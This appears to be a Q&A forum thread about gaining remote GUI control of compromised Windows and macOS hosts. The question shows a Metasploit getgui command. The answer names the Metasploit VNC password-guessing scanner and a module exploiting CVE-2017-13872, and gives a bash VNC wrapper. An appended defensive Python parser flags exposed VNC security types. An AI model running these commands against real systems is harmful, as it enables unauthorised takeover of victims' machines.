If the exploited victim OS is Windows, Metasploit has the getgui command to run RDP. One can then manipulate the victim OS through the GUI desktop interface.

meterpreter > run getgui -u loneferret -p password

(documentation)

  • Is there a similar one-command setup tool for macOS victims?
  • I know macOS doesn't support RDP, but maybe there are some Metasploit / EvilOSX modules to set up a VNC connection?
  • Or must I do it manually, without easy-to-use scripts?
mike

1 Answer

Q1: Is there a similar one-command setup tool for macOS victims? ... or maybe some Metasploit / EvilOSX modules to set up a VNC connection?

You can try the vnc_login auxiliary scanner to identify whether VNC is available on the target and attempt to log in with a password or a wordlist:

msf > use auxiliary/scanner/vnc/vnc_login

And/or ard_root_pw to remotely exploit CVE-2017-13872 over port 5900, if the requirements are met:

msf > use auxiliary/scanner/vnc/ard_root_pw

Some notes by ard_root_pw's author (jgor):

This extends Rex::Proto::RFB to support usernames, implements authentication security type 30 ("Apple Remote Desktop" / ARD used by macOS), and uses that to add a module to remotely exploit CVE-2017-13872 over 5900/tcp on vulnerable macOS High Sierra hosts that have either Screen Sharing or Remote Management enabled.

(source)

Q2: Or I must do it manually without easy to use scripts?

If you already have access (with a shell or meterpreter) on the target, you should consider that Apple includes a VNC client by default; you can use it with a simple bash script:

echo '#!/usr/bin/env bash' >> /usr/local/bin/vncviewer
echo open vnc://\$1 >> /usr/local/bin/vncviewer
chmod +x /usr/local/bin/vncviewer

After that, simply use: vncviewer [IP]:5901

(source)

mike
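
The module notes quoted in the answer refer to RFB security type 30 (ARD), which a defender can read out of a captured handshake to find hosts that expose Screen Sharing or Remote Management. As an added example (not part of the answer and not Metasploit code), this Python parser takes the server-to-client bytes that open an RFB session and flags types 1 and 30; the sample byte strings are constructed and the function names are hypothetical.

```python
import struct

# Constructed samples of the server-to-client bytes that open an RFB session.
SAMPLE_ARD = b"RFB 003.008\n" + bytes([2, 30, 2])          # offers types 30 and 2
SAMPLE_OPEN = b"RFB 003.003\n" + struct.pack(">I", 1)      # 3.3 server, type 1
SAMPLE_REFUSED = b"RFB 003.008\n\x00" + struct.pack(">I", 4) + b"busy"


def parse_server_handshake(stream: bytes) -> dict:
    """Return version, offered security types and any refusal reason."""
    if len(stream) < 12 or stream[:4] != b"RFB " or stream[11:12] != b"\n":
        raise ValueError("not an RFB ProtocolVersion message")
    version = (int(stream[4:7]), int(stream[8:11]))
    body = stream[12:]
    if version < (3, 7):
        # RFB 3.3: the server chooses one type and sends it as a U32.
        if len(body) < 4:
            raise ValueError("truncated security type")
        chosen = struct.unpack(">I", body[:4])[0]
        types, rest = ([chosen] if chosen else []), body[4:]
    else:
        # RFB 3.7 and later: U8 count, then that many U8 type codes.
        if not body or len(body) < 1 + body[0]:
            raise ValueError("truncated security type list")
        types, rest = list(body[1:1 + body[0]]), body[1 + body[0]:]
    reason = None
    if not types and len(rest) >= 4:
        # No usable type: a U32 length and a reason string follow.
        (length,) = struct.unpack(">I", rest[:4])
        reason = rest[4:4 + length].decode("latin-1")
    return {"version": version, "types": types, "reason": reason}


def audit(stream: bytes) -> list:
    """List findings a defender would act on for this VNC endpoint."""
    types = parse_server_handshake(stream)["types"]
    findings = []
    if 1 in types:
        findings.append("type 1 (None): sessions open without authentication")
    if 30 in types:
        # Type 30 is the ARD type the answer associates with macOS.
        findings.append("type 30 (ARD): Screen Sharing or Remote Management is "
                        "reachable; confirm the host is patched for CVE-2017-13872")
    return findings


if __name__ == "__main__":
    for name, sample in [("ard", SAMPLE_ARD), ("open", SAMPLE_OPEN)]:
        print(name, parse_server_handshake(sample)["types"], audit(sample))
```

Feed it the reassembled server side of a TCP stream on port 5900 from a packet capture; it makes no network connections itself.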